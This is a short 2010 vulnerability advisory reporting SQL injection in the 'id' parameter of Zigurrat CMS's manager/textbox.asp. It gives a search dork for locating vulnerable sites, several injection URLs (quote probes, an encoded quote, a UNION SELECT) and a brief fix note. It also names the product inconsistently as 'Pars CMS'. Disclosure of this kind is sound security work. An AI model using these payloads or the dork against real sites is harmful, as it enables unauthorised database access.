Zigurrat CMS SQL Injection Vulnerability

2010-03-21
ID: 11391
CVE: None
Download vulnerable application: None
================= IUT-CERT =================
 Title: 
 Vendor: www.farsi-cms.com
 Dork: Design by Tagfa Co
Type: Input.Validation.Vulnerability (SQL Injection)
 Fix: N/A
 ================== nsec.ir =================
 Description:
 ------------------
 Zigurrat CMS is a CMS producer in Iran. "manager/textbox.asp"
pages in Pars CMS
 product are vulnerable to SQL Injection vulnerability.
 Vulnerability Variant:
 ------------------
Injection "manager/textbox.asp" in "id" parameter.
 http://www.example.com/manager/textbox.asp?id='
 http://www.example.com/manager/textbox.asp?id=0'
 http://www.example.com/manager/textbox.asp?id=%2527
 http://www.example.com/manager/textbox.asp?id='
 http://www.example.com/manager/textbox.asp?id=<number> UNION SELECT
*FROM VALIDTBLNAME'
 Solution:
 ------------------
 Input validation of Parameter "id" should be corrected.
1-4-2 (www01)